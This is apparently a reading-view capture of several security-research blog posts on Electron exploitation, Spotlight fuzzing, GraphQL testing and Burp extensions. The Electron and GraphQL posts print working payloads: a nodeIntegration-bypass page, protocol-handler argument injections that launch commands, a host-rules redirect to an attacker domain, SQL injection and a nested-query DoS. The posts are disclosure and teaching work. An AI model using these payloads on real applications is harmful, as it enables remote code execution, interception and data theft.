Reading view

There are new articles available, click to refresh the page.

Developing Burp Suite Extensions training

We couldn't be more excited to present our brand-new class on web security and security automation. This blog post provides a quick overview of the 8-hours workshop.

Title

Developing Burp Suite Extensions - From manual testing to security automation.

Overview

Ensuring the security of web applications in continuous delivery environments is an open challenge for many organizations. Traditional application security practices slow development and, in many cases, don’t address security at all. Instead, a new approach based on security automation and tactical security testing is needed to ensure important components are being tested before going live. Security professionals must master their tools to improve the efficiency of manual security testing as well as to deploy custom security automation solutions.

Based on this premise, we have created a brand-new class taking advantage of Burp Suite - the de-facto standard for web application security. In just eight hours, we show you how to use Burp Suite’s extension capabilities and unleash the power of the tool to improve efficiency and effectiveness during security audits.

After a quick intro to Burp and its extension APIs, we work on setting up an optimal development environment enabling fast coding and debugging. While we develop our code using Oracle’s Netbeans, we also provide templates for IntelliJ IDEA and Eclipse.

We will create many different types of plugins:

  • Extension #1: A custom logger to provide persistency and data export functionalities
  • Extension #2: A simple (and yet useful) replay tool
  • Extension #3: Active check for Burp’s scanning engine
  • Extension #4: Passive check for Burp’s scanning engine

Finally, we leverage our extensions to build a security automation toolchain integrated in a CI environment (Jenkins). This workshop is based on real-life use cases where the combination of custom checks and automation can help uncovering nasty security vulnerabilities.

All templates and code-complete Burp Suite extensions will be available for free on Doyensec’s Github. If you are curious, we’ve already uploaded the first three modules.

Audience

The training is suitable for both web application security specialists and developers. Attendees are expected to have rudimental understanding of Burp Suite as well as basic object-oriented programming experience (Burp extensions will be developed in Java).

Requirements

Attendees should bring their own laptop with the latest Java as well as their favourite IDE installed.

Upcoming dates

Location Date Notes
Heidelberg
(Germany)
March 21, 2017 Delivered during Troopers 2017 security conference. There are still seats available. Book it today and get Burp swag during the training!
Warsaw
(Poland)
June 5, 2017 Come for WarCon invite-only conference, stay for the training!
For registration, please contact [email protected] with subject line "Burp Training Post-WarCon".

Private training

This training is delivered worldwide (English language) during both public and private events. Considering that the class is hands-on, we are able to accept up to 15 attendees. Video recording available on request.

Feel free to contact us at [email protected] for scheduling your class!

Modern Alchemy: Turning XSS into RCE

TL;DR

At the recent Black Hat Briefings 2017, Doyensec’s co-founder Luca Carettoni presented a new research on Electron security. After a quick overview of Electron’s security model, we disclosed design weaknesses and implementation bugs that can be leveraged to compromise any Electron-based application. In particular, we discussed a bypass that would allow reliable Remote Code Execution (RCE) when rendering untrusted content (for example via Cross-Site Scripting) even with framework-level protections in place.

In this blog post, we would like to provide insight into the bug (CVE-2017-12581) and remediations.

What’s Electron?

While you may not recognize the name, it is likely that you’re already using Electron since it’s running on millions of computers. Slack, Atom, Visual Studio Code, WordPress Desktop, Github Desktop, Basecamp3, Mattermost are just few examples of applications built using this framework. Any time that a traditional web application is ported to desktop, it is likely that the developers used Electron.

Electron Motto

Understanding the nodeIntegration flag

While Electron is based on Chromium’s Content module, it is not a browser. Since it facilitates the construction of complex desktop applications, Electron gives the developer a lot of power. In fact, thanks to the integration with Node.js, JavaScript can access operating system primitives to take full advantage of native desktop mechanisms.

It is well understood that rendering untrusted remote/local content with Node integration enabled is dangerous. For this reason, Electron provides two mechanisms to “sandbox” untrusted resources:

BrowserWindow

mainWindow = new BrowserWindow({  
	"webPreferences": { 
		"nodeIntegration" : false,  
		"nodeIntegrationInWorker" : false 
	}
});

mainWindow.loadURL('https://www.doyensec.com/');

WebView

<webview src="https://www.doyensec.com/"></webview>

In above examples, the nodeIntegration flag is set to false. JavaScript running in the page won’t have access to global references despite having a Node.js engine running in the renderer process.

Hunting for nodeIntegration bypasses

It should now be clear why nodeIntegration is a critical security-relevant setting for the framework. A vulnerability in this mechanism could lead to full host compromise from simply rendering untrusted web pages. As modern alchemists, we use this type of flaws to turn traditional XSS into RCE. Since all Electron applications are bundled with the framework code, it is also complicated to fix these issues across the entire ecosystem.

During our research, we have extensively analyzed all project code changes to uncover previously discovered bypasses (we counted 6 before v1.6.1) with the goal of studying Electron’s design and weaknesses. Armed with that knowledge, we went for a hunt.

By studying the official documentation, we quickly identified a significant deviation from standard browsers caused by Electron’s “glorified” JavaScript APIs.

When a new window is created, Electron returns an instance of BrowserWindowProxy. This class can be used to manipulate the child browser window, thus subverting the Same-Origin Policy (SOP).

SOP Bypass #1

<script>
const win = window.open("https://www.doyensec.com"); 
win.location = "javascript:alert(document.domain)"; 
</script> 

SOP Bypass #2

<script>
const win = window.open("https://www.doyensec.com"); 
win.eval("alert(document.domain)");
</script>

The eval mechanism used by the SOP Bypass #2 can be explained with the following diagram:

BrowserWindowProxy's Eval

Additional source code review revealed the presence of privileged URLs (similar to browsers’ privileged zones). Combining the SOP-bypass by design with a specific privileged url defined in lib/renderer/init.js, we realized that we could override the nodeIntegration setting.

Chrome DevTools in Electron, prior to 1.6.8

A simple, yet reliable, proof-of-concept of the nodeIntegration bypass affecting all Electron releases prior to 1.6.7 is hereby included:

<!DOCTYPE html>
<html>
  <head>
    <title>nodeIntegration bypass (SOP2RCE)</title>
  </head>
  <body>
  	<script>
    	document.write("Current location:" + window.location.href + "<br>");

    	const win = window.open("chrome-devtools://devtools/bundled/inspector.html");
    	win.eval("const {shell} = require('electron'); 
    	shell.openExternal('file:///Applications/Calculator.app');");
       </script>
  </body>
</html>

On May 10, 2017 we reported this issue to the maintainers via email. In a matter of hours, we received a reply that they were already working on a fix since the privileged chrome-devtools:// was discovered during an internal security activity just few days before our report. In fact, while the latest release on the official website at that time was 1.6.7, the git commit that fixes the privileged url is dated April 24, 2017.

The issue was fixed in 1.6.8 (officially released around the 15th of May). All previous versions of Electron and consequently all Electron-based apps were affected. Mitre assigned CVE-2017-12581 for this issue.

Mitigating nodeIntegration bypass vulnerabilities

  • Keep your application in sync with the latest Electron framework release. When releasing your product, you’re also shipping a bundle composed of Electron, Chromium shared library and Node. Vulnerabilities affecting these components may impact the security of your application. By updating Electron to the latest version, you ensure that critical vulnerabilities (such as nodeIntegration bypasses) are already patched and cannot be exploited to abuse your application.

  • Adopt secure coding practices. The first line of defense for your application is your own code. Common web vulnerabilities, such as Cross-Site Scripting (XSS), have a higher security impact on Electron hence it is highly recommend to adopt secure software development best practices and perform periodic security testing.

  • Know your framework (and its limitations). Certain principles and security mechanisms implemented by modern browsers are not enforced in Electron (e.g. SOP enforcement). Adopt defense in depth mechanisms to mitigate those deficiencies. For more details, please refer to our Electronegativity, A study of Electron Security presentation and Electron Security Checklist white-paper.

  • Use the recent “sandbox” experimental feature. Even with nodeIntegration disabled, the current implementation of Electron does not completely mitigate all risks introduced by loading untrusted resources. As such, it is recommended to enable sandboxing which leverages the native Chromium sandbox. A sandboxed renderer does not have a Node.js environment running (with the exception of preload scripts) and the renderers can only make changes to the system by delegating tasks to the main process via IPC. While still not perfect at the time of writing (there are known security issues, sandbox is not supported for the <webview> tag, etc.) this option should be enabled to provide additional isolation.

Staring into the Spotlight

Spotlight is the all pervasive seeing eye of the OSX userland. It drinks from a spout of file events sprayed out of the kernel and neatly indexes such things for later use. It is an amalgamation of binaries and libraries, all neatly fitted together just to give a user oversight of their box. It presents interesting attack surface and this blog post is an explanation of how some of it works.

One day, we found some interesting looking crashes recorded in /Users/<name>/Library/Logs/DiagnosticReports

Yet the crashes weren’t from the target. In OSX, whenever a file is created, a filesystem event is generated and sent down from the kernel. Spotlight listens for this event and others to immediately parse the created file for metadata. While fuzzing a native file parser these Spotlight crashes began to appear from mdworker processes. Spotlight was attempting to index each of the mutated input samples, intending to include them in search results later.

fsevents

The Spotlight system is overseen by mds. It opens and reads from /dev/fsevents, which streams down file system event information from the kernel. Instead of dumping the events to disk, like fseventsd, it dumps the events into worker processes to be parsed on behalf of Spotlight. Mds is responsible for delegating work and managing mdworker processes with whom it communicates through mach messaging. It creates, monitors, and kills mdworkers based on some light rules. The kernel does not block and the volume of events streaming through the fsevents device can be quite a lot. Mds will spawn more mdworker processes when handling a higher event magnitude but there is no guarantee it can see and capture every single event.

The kernel filters which root level processes can read from this device. fsevents filter

Each of the mdworker processes get spawned, parse some files, write the meta info, and die. Mdworker shares a lot of code with mdimport, its command line equivalent. The mdimport binary is used to debug and test Spotlight importers and therefore makes a great target for auditing and fuzzing. Much of what we talk about in regards to mdimport also applies to mdworker.

Importers

You can see what mdworkers are up to with the following: sudo fs_usage -w -f filesys mdworker

Importers are found in /Library/Spotlight, /System/Library/Spotlight, or in an application’s bundle within “/Contents/Library/Spotlight”. If the latter is chosen, the app typically runs a post install script with mdimport -r <importer> and/or lsregister. The following command shows the list of importers present on my laptop. It shows some third party apps have installed their own importers.

$ mdimport -L
2017-07-30 00:36:15.518 mdimport[40541:1884333] Paths: id(501) (
    "/Library/Spotlight/iBooksAuthor.mdimporter",
    "/Library/Spotlight/iWork.mdimporter",
    "/Library/Spotlight/Microsoft Office.mdimporter",
    "/System/Library/Spotlight/Application.mdimporter",
...
    "/System/Library/Spotlight/SystemPrefs.mdimporter",
    "/System/Library/Spotlight/vCard.mdimporter",
    "/Applications/Xcode.app/Contents/Applications/Application Loader.app/Contents/Library/Spotlight/MZSpotlight.mdimporter",
    "/Applications/LibreOffice.app/Contents/Library/Spotlight/OOoSpotlightImporter.mdimporter",
    "/Applications/OmniGraffle.app/Contents/Library/Spotlight/OmniGraffle.mdimporter",
    "/Applications/GarageBand.app/Contents/Library/Spotlight/LogicX_MDImport.mdimporter",
    "/Applications/Xcode.app/Contents/Library/Spotlight/uuid.mdimporter"
)

These .mdimporter files are actually just packages holding a binary. These binaries are what we are attacking.

Using mdimport is simple - mdimport <file>. Spotlight will only index metadata for filetypes having an associated importer. File types are identified through magic. For example, mdimport reads from the MAGIC environment variable or uses the “/usr/share/file/magic” directory which contains both the compiled .mgc file and the actual magic patterns. The format of magic files is discussed at the official Apple developer documentation.

Crash File

crash logging

One thing to notice is that the crash log will contain some helpful information about the cause. The following message gets logged by both mdworker and mdimport, which share much of the same code:

Application Specific Information:
import fstype:hfs fsflag:480D000 flags:40000007E diag:0 isXCode:0 uti:com.apple.truetype-datafork-suitcase-font plugin:/Library/Spotlight/Font.mdimporter - find suspect file using: sudo mdutil -t 2682437

The 2682437 is the iNode reference number for the file in question on disk. The -t argument to mdutil will ask it to lookup the file based on volume ID and iNode and spit out the string. It performs an open and fcntl on the pseudo directory /.vol/<Volume ID>/<File iNode>. You can see this info with the stat syscall on a file.

$ stat /etc
16777220 418395 lrwxr-xr-x 1 root wheel 0 11 "Dec 10 05:13:41 2016" "Dec 10 05:13:41 2016" "Dec 10 05:15:47 2016" "Dec 10 05:13:41 2016" 4096 8 0x88000 /etc

$ ls /.vol/16777220/418395
afpovertcp.cfg    fstab.hd            networks          protocols
aliases           ftpd.conf           newsyslog.conf    racoon
aliases.db        ftpd.conf.default   newsyslog.d       rc.common

The UTI registered by the importer is also shown “com.apple.truetype-datafork-suitcase-font”. In this case, the crash is caused by a malformed Datafork TrueType suitcase (.dfont) file.

When we find a bug, we can study it under lldb. Launch mdimport under the debugger with the crash file as an argument. In this particular bug it breaks with an exception in the /System/Library/Spotlight/Font.mdimporter importer.

crash logging

The screenshot below shows the problem procedure with the crashing instruction highlighted for this particular bug.

The rsi register points into the memory mapped font file. A value is read out and stored in rax which is then used as an offset from rcx which points to the text segment of the executable in memory. A lookup is done on a hardcoded table and parsing proceeds from there. The integer read out of the font file is never validated.

When writing or reversing a Spotlight importer, the main symbol to first look at will be GetMetadataForFile or GetMetadataForURL. This function receives a path to parse and is expected to return the metadata as a CFDictionary.

We can see, from the stacktrace, how and where mdimport jumps into the GetMetadataForFile function in the Font importer. Fuzzing mdimport is straightforward, crashes and signals are easily caught.

The variety of importers present on OSX are sometimes patched alongside the framework libraries, as code is shared. However, a lot of code is unique to these binaries and represents a nice attack surface. The Spotlight system is extensive, including its own query language and makes a great target where more research is needed.

When fuzzing in general on OSX, disable Spotlight oversight of the folder where you generate and remove your input samples. The folder can be added in System Preferences->Spotlight->Privacy. You can’t fuzz mdimport from this folder, instead disable Spotlight with “mdutil -i off” and run your fuzzer from a different folder.

@day6reak

We're hiring - Join Doyensec!

At Doyensec, we believe that quality is the natural product of passion and care. We love what we do and we routinely take on difficult engineering challenges to help our customers build with security.

We are a small highly focused team. We concentrate on application security and do fewer things better. We don’t care about your education, background and certifications. If you are really good and passionate at building and breaking complex software, you’re the right candidate.

Open Positions

:: Full-stack Security Automation Engineer (Six Months Collaboration, Remote Work) ::

We are looking for a full-stack senior software engineer that can help us build security automation tools. If you’ve ever built a fuzzer, played with static analysis and enhanced a web scanner engine, you probably have the right skillset for the job.

We offer a well-paid six-months collaboration, combined with an additional bonus upon successful completion of the project.

Responsibilities:

  • Full-stack development (front-end, back-end components) of web security testing tools
  • Solve technical challenges at the edge of web security R&D, together with Doyensec’s founders

Requirements:

  • Experience developing multi-tiered software applications or products. We generally use Node.js and Java, and require proficiency in those languages
  • Ability to work with standard dev tools and techniques (IDE, git, …)
  • You’re passionate about building great software and can have fun while doing it
  • Interested in web security, with good understanding of common software vulnerabilities
  • You’re self-driven and can focus on a project to make it happen
  • Eager to learn, adapt and perfect your work

Contact us at [email protected]

:: Application Security Engineer (Full-time, Remote Work - Europe) ::

We are looking for an experienced security engineer to join our consulting team. We perform graybox security testing on complex web and mobile applications. We need someone who can hit the ground running. If you’re good at “crawling around in the ventilation ducts of the world’s most popular and important applications”, you probably have the right skillset for the job.

We offer a competitive salary in a supportive and dynamic environment that rewards hard work and talent. We are dedicated to providing research-driven application security and therefore invest 25% of your time exclusively to research where we build security testing tools, discover new attack techniques, and develop countermeasures.

Responsibilities:

  • Security testing of web, mobile (iOS, Android) applications
  • Vulnerability research activities, coordinated and executed with Doyensec’s founders
  • Partner with customers to ensure project’s objectives are achieved 

Requirements:

  • Ability to discover, document and fix security bugs
  • You’re passionate about understanding complex systems and can have fun while doing it
  • Top-notch in web security. Show us public research, code, advisories, etc.
  • Eager to learn, adapt, and perfect your work

Contact us at [email protected]

GraphQL - Security Overview and Testing Tips

With the increasing popularity of GraphQL technology we are summarizing some documentation and tips about common security mistakes.

What is GraphQL?

GraphQL is a data query language developed by Facebook and publicly released in 2015. It is an alternative to REST API.

Even if you don’t see any GraphQL out there, it is likely you’re already using it since it’s running on some big tech giants like Facebook, GitHub, Pinterest, Twitter, HackerOne and a lot more.

A few key points on this technology

  • GraphQL provides a complete and understandable description of the data in the API and gives clients the power to ask for exactly what they need. Queries always return predictable results.

  • While typical REST APIs require loading from multiple URLs, GraphQL APIs get all the data your app needs in a single request.

  • GraphQL APIs are organized in terms of types and fields, not endpoints. You can access the full capabilities of all your data from a single endpoint.

  • GraphQL is strongly typed to ensure that application only ask for what’s possible and provide clear and helpful errors.

  • New fields and types can be added to the GraphQL API without impacting existing queries. Aging fields can be deprecated and hidden from tools.

Before we start diving into the GraphQL security landscape, here is a brief recap on how it works. The official documentation is well written and was really helpful.

A GraphQL query looks like this:

Basic GraphQL Query

query{
	user{
		id
		email
		firstName
		lastName
	}
}

While the response is JSON:

Basic GraphQL Response

{
	"data": {
		"user": {
			"id": "1",
			"email": "[email protected]",
			"firstName": "Paolo",
			"lastName": "Stagno"
		}
	}
}

Security Testing Tips

Since Burp Suite does not understand GraphQL syntax well, I recommend using the graphql-ide, an Electron based app that allows you to edit and send requests to a GraphQL endpoint; I also wrote a small python script GraphQL_Introspection.py that enumerates a GraphQL endpoint (with introspection) in order to pull out documentation. The script is useful for examining the GraphQL schema looking for information leakage, hidden data and fields that are not intended to be accessible.

The tool will generate a HTML report similar to the following:

Python Script pulling data from a GraphQL endpoint

Introspection is used to ask for a GraphQL schema for information about what queries, types and so on it supports.

As a pentester, I would recommend to look for requests issued to “/graphql” or “/graphql.php” since those are usual GraphQL endpoint names; you should also search for “/graphiql”, ”graphql/console/”, online GraphQL IDEs to interact with the backend, and “/graphql.php?debug=1” (debugging mode with additional error reporting) since they may be left open by developers.

When testing an application, verify whether requests can be issued without the usual authorization token header:

GraphQL Bearer Authorization Header Example

Since the GraphQL framework does not provide any means for securing your data, developers are in charge of implementing access control as stated in the documentation:

“However, for a production codebase, delegate authorization logic to the business logic layer”.

Things may go wrong, thus it is important to verify whether a user without proper authentication and/or authorization can request the whole underlying database from the server.

When building an application with GraphQL, developers have to map data to queries in their chosen database technology. This is where security vulnerabilities can be easily introduced, leading to Broken Access Controls, Insecure Direct Object References and even SQL/NoSQL Injections.

As an example of a broken implementation, the following request/response demonstrates that we can fetch data for any users of the platform (cycling through the ID parameter), while simultaneously dumping password hashes:

Query

query{
	user(id: 165274){
		id
		email
		firstName
		lastName
		password
	}
}

Response

{
	"data": {
		"user": {
			"id": "165274",
			"email": "[email protected]",
			"firstName": "John",
			"lastName": "Doe"
			"password": "5F4DCC3B5AA765D61D8327DEB882CF99"
		}
	}
}

Another thing that you will have to check is related to information disclosure when trying to perform illegal queries:

Information Disclosure

{
	"errors": [
		{
			"message": "Invalid ID.",
			"locations": [
				{
					"line": 2,
					"column": 12
				}
				"Stack": "Error: invalid ID\n at (/var/www/examples/04-bank/graphql.php)\n"
      			]
		}
	]
}

Even though GraphQL is strongly typed, SQL/NoSQL Injections are still possible since GraphQL is just a layer between client apps and the database. The problem may reside in the layer developed to fetch variables from GraphQL queries in order to interrogate the database; variables that are not properly sanitized lead to old simple SQL Injection. In case of Mongodb, NoSQL injection may not be that simple since we cannot “juggle” types (e.g. turning a string into an array. See PHP MongoDB Injection).

GraphQL SQL Injection

mutation search($filters Filters!){
	authors(filter: $filters)
	viewer{
		id
		email
		firstName
		lastName
	} 
}

{
	"filters":{
		"username":"paolo' or 1=1--"
		"minstories":0
	}
}

Beware of nested queries! They can allow a malicious client to perform a DoS (Denial of Service) attack via overly complex queries that will consume all the resources of the server:

Nested Query

query {
 stories{
  title
  body
  comments{
   comment
   author{
    comments{
     author{
      comments{
       comment
       author{
        comments{
         comment
         author{
          comments{
           comment
           author{
            name
           }
          }
         }
        }
       }
      }
     }
    }
   }
  }
 }
}

An easy remediation against DoS could be setting a timeout, a maximum depth or a query complexity threshold value.

Keep in mind that in the PHP GraphQL implementation:

  • Complexity analysis is disabled by default

  • Limiting Query Depth is disabled by default

  • Introspection is enabled by default. It means that anybody can get a full description of your schema by sending a special query containing meta fields type and schema

Outro

GraphQL is a new interesting technology, which can be used to build secure applications. Since developers are in charge of implementing access control, applications are prone to classical web application vulnerabilites like Broken Access Controls, Insecure Direct Object References, Cross Site Scripting (XSS) and Classic Injection Bugs. As any technology, GraphQL-based applications may be prone to development implementation errors like this real-life example:

“By using a script, an entire country’s (I tested with the US, the UK and Canada) possible number combinations can be run through these URLs, and if a number is associated with a Facebook account, it can then be associated with a name and further details (images, and so on).”

@voidsec

Resources:

Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.

Under certain circumstances this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via [email protected]) on May 14, 2018 and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.

CVE-2018-1000006

On January 22, 2018 Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

<script>
win.location = 'myapp://foobar" --gpu-launcher="cmd c/ start calc" --foobar='
</script>

Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters and led to a bypass in the previous patch with:

<script>
win.location = 'myapp://foobar" --GPU-launcher="cmd c/ start calc" --foobar='
</script> 

Understanding the patch

The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after a url (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
  DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
                        [](const char* a, const char* b) {
                          return base::StringPiece(a) < base::StringPiece(b);
                        }))
      << "The kBlacklist must be in sorted order";
  DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
                            base::StringPiece("inspect")))
      << "Remember to add Node command line flags to kBlacklist";

  const base::CommandLine::StringType dashdash(2, '-');
  bool block_blacklisted_args = false;
  for (int i = 0; i < argc; ++i) {
    if (argv[i] == dashdash)
      break;
    if (block_blacklisted_args) {
      if (IsBlacklistedArg(argv[i]))
        return false;
    } else if (IsUrlArg(argv[i])) {
      block_blacklisted_args = true;
    }
  }
  return true;
}

As is commonly seen, blacklist-based validation is prone to errors and omissions especially in complex execution environments like Electron:

  • The patch relies on a static blacklist of available chromium flags. On each libchromiumcontent update the Electron team must remember to update the command_line_args.cc file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8
  • The blacklist is implemented using a binary search. Valid flags could be missed by the check if they’re not properly sorted

Bypass and security implications

We started looking for missed flags and noticed that host-rules was absent from the blacklist. With this flag one may specify a set of rules to rewrite domain names for requests issued by libchroumiumcontent. This immediately stuck out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform completely transparent Man-In-The-Middle:

<!doctype html>
<script>
 window.location = 'skype://user?userinfo" --host-rules="MAP * evil.doyensec.com" --foobar='
</script>

When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proof-of-concepts for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. oauth tokens), this issue can be also abused to inject malicious HTML responses containing XSS -> RCE payloads. With nodeIntegration enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses).

Please note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason Electron’s update feature, along with other critical functionss, are not affected by this vulnerability.

Future

On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce a dash-dash notation in setAsDefaultProtocolClient

app.setAsDefaultProtocolClient(protocol, process.execPath, [
  '--your-switches-here',
  '--'
])

or in the Windows protocol handler registry entry

secure Windows protocol handler

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.

@ikkisoft

@day6reak

Instrumenting Electron Apps for Security Testing

Instrumenting Electron-based applications

With the increasing popularity of the Electron Framework, we have created this post to summarize a few techniques which can be used to instrument an Electron-based application, change its behavior, and perform in-depth security assessments.

Electron and processes

The Electron Framework is used to develop multi-platform desktop applications with nothing more than HTML, JavaScript and CSS. It has two core components: Node.js and the libchromiumcontent module from the Chromium project.

In Electron, the main process is the process that runs package.json’s main script. This component has access to Node.js primitives and is responsible for starting other processes. Chromium is used for displaying web pages, which are rendered in separate processes called renderer processes.

Unlike regular browsers where web pages run in a sandboxed environment and do not have access to native system resources, Electron renderers have access to Node.js primitives and allow lower level integration with the underlying operating system. Electron exposes full access to native Node.js APIs, but it also facilitates the use of external Node.js NPM modules.

As you might have guessed from recent public security vulnerabilities, the security implications are substantial since JavaScript code can access the filesystem, user shell, and many more primitives. The inherent security risks increase with the additional power granted to application code. For instance, displaying arbitrary content from untrusted sources inside a non-isolated renderer is a severe security risk. You can read more about Electron Security, hardening and vulnerabilities prevention in the official Security Recommendations document.

Unpacking the ASAR archive

The first thing to do to inspect the source code of an Electron-based application is to unpack the application bundle (.asar file). ASAR archives are a simple tar-like format that concatenates files into a single one.

First locate the main ASAR archive of our app, usually named core.asar or app.asar.

Once we have this file we can proceed with installing the asar utility: npm install -g asar

and extract the whole archive: asar extract core.asar destinationfolder

At its simplest version, an Electron application includes three files: index.js, index.html and package.json.

Our first target to inspect is the package.json file, as it holds the path of the file responsible for the “entry point” of our application:

{
  "name": "Example App",
  "description": "Core App",
  "main": "app/index.js",
  "private": true,
}

In our example the entry point is the file called index.js located within the app folder, which will be executed as the main process. If not specified, index.js is the default main file. The file index.html and other web resources are used in renderer processes to display actual content to the user. A new renderer process is created for every browserWindow instantiated in the main process.

In order to be able to follow functions and methods in our favorite IDE, it is recommended to resolve the dependencies of our app:

npm install

We should also install Devtron, a tool (built on top of the Chrome Developer Tools) to inspect, monitor and debug our Electron app. For Devtron to work, NodeIntegration must be on.

npm install --save-dev devtron

Then, run the following from the Console tab of the Developer Tools

require('devtron').install()

Dealing with obfuscated javascript

Whenever the application is neither minimized nor obfuscated, we can easily inspect the code.

'use strict';

Object.defineProperty(exports, "__esModule", {
  value: true
});
exports.startup = startup;
exports.handleSingleInstance = handleSingleInstance;
exports.setMainWindowVisible = setMainWindowVisible;

var _require = require('electron'),
    Menu = _require.Menu;

var mainScreen = void 0;
function startup(bootstrapModules) {
[ -- cut -- ]

In case of obfuscation, there are no silver bullets to unfold heavily manipulated javascript code. In these situations, a combination of automatic tools and manual reverse engineering is required to get back to the original source.

Take this horrendous piece of JS as an example:

eval(function(c,d,e,f,g,h){g=function(i){return(i<d?'':g(parseInt(i/d)))+((i=i%d)>0x23?String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](i+0x1d):i['\x74\x6f\x53\x74\x72\x69\x6e\x67'](0x24));};while(e--){if(f[e]){c=c['\x72\x65\x70\x6c\x61\x63\x65'](new RegExp('\x5c\x62'+g(e)+'\x5c\x62','\x67'),f[e]);}}return c;}('\x62\x20\x35\x3d\x5b\x22\x5c\x6f\x5c\x38\x5c\x70\x5c\x73\x5c\x34\x5c\x63\x5c\x63\x5c\x37\x22\x2c\x22\x5c\x72\x5c\x34\x5c\x64\x5c\x74\x5c\x37\x5c\x67\x5c\x6d\x5c\x64\x22\x2c\x22\x5c\x75\x5c\x34\x5c\x66\x5c\x66\x5c\x38\x5c\x71\x5c\x34\x5c\x36\x5c\x6c\x5c\x36\x22\x2c\x22\x5c\x6e\x5c\x37\x5c\x67\x5c\x36\x5c\x38\x5c\x77\x5c\x34\x5c\x36\x5c\x42\x5c\x34\x5c\x63\x5c\x43\x5c\x37\x5c\x76\x5c\x34\x5c\x41\x22\x5d\x3b\x39\x20\x6b\x28\x65\x29\x7b\x62\x20\x61\x3d\x30\x3b\x6a\x5b\x35\x5b\x30\x5d\x5d\x3d\x39\x28\x68\x29\x7b\x61\x2b\x2b\x3b\x78\x28\x65\x2b\x68\x29\x7d\x3b\x6a\x5b\x35\x5b\x31\x5d\x5d\x3d\x39\x28\x29\x7b\x79\x20\x61\x7d\x7d\x62\x20\x69\x3d\x7a\x20\x6b\x28\x35\x5b\x32\x5d\x29\x3b\x69\x2e\x44\x28\x35\x5b\x33\x5d\x29',0x28,0x28,'\x7c\x7c\x7c\x7c\x78\x36\x35\x7c\x5f\x30\x7c\x78\x32\x30\x7c\x78\x36\x46\x7c\x78\x36\x31\x7c\x66\x75\x6e\x63\x74\x69\x6f\x6e\x7c\x5f\x31\x7c\x76\x61\x72\x7c\x78\x36\x43\x7c\x78\x37\x34\x7c\x5f\x32\x7c\x78\x37\x33\x7c\x78\x37\x35\x7c\x5f\x33\x7c\x6f\x62\x6a\x7c\x74\x68\x69\x73\x7c\x4e\x65\x77\x4f\x62\x6a\x65\x63\x74\x7c\x78\x33\x41\x7c\x78\x36\x45\x7c\x78\x35\x39\x7c\x78\x35\x33\x7c\x78\x37\x39\x7c\x78\x36\x37\x7c\x78\x34\x37\x7c\x78\x34\x38\x7c\x78\x34\x33\x7c\x78\x34\x44\x7c\x78\x36\x44\x7c\x78\x37\x32\x7c\x61\x6c\x65\x72\x74\x7c\x72\x65\x74\x75\x72\x6e\x7c\x6e\x65\x77\x7c\x78\x32\x45\x7c\x78\x37\x37\x7c\x78\x36\x33\x7c\x53\x61\x79\x48\x65\x6c\x6c\x6f'['\x73\x70\x6c\x69\x74']('\x7c')));

It can be manually turned into:

eval(function (c, d, e, f, g, h) {
    g = function (i) {
        return (i < d ? '' : g(parseInt(i / d))) + ((i = i % d) > 35 ? String['fromCharCode'](i + 29) : i['toString'](36));
    };
    while (e--) {
        if (f[e]) {
            c = c['replace'](new RegExp('\\b' + g(e) + '\\b', 'g'), f[e]);
        }
    }
    return c;
}('b 5=["\\o\\8\\p\\s\\4\\c\\c\\7","\\r\\4\\d\\t\\7\\g\\m\\d","\\u\\4\\f\\f\\8\\q\\4\\6\\l\\6","\\n\\7\\g\\6\\8\\w\\4\\6\\B\\4\\c\\C\\7\\v\\4\\A"];9 k(e){b a=0;j[5[0]]=9(h){a++;x(e+h)};j[5[1]]=9(){y a}}b i=z k(5[2]);i.D(5[3])', 40, 40, '||||x65|_0|x20|x6F|x61|function|_1|var|x6C|x74|_2|x73|x75|_3|obj|this|NewObject|x3A|x6E|x59|x53|x79|x67|x47|x48|x43|x4D|x6D|x72|alert|return|new|x2E|x77|x63|SayHello'['split']('|')));

Then, it can be passed to JStillery, JS Nice and other similar tools in order to get back a human readable version.

'use strict';
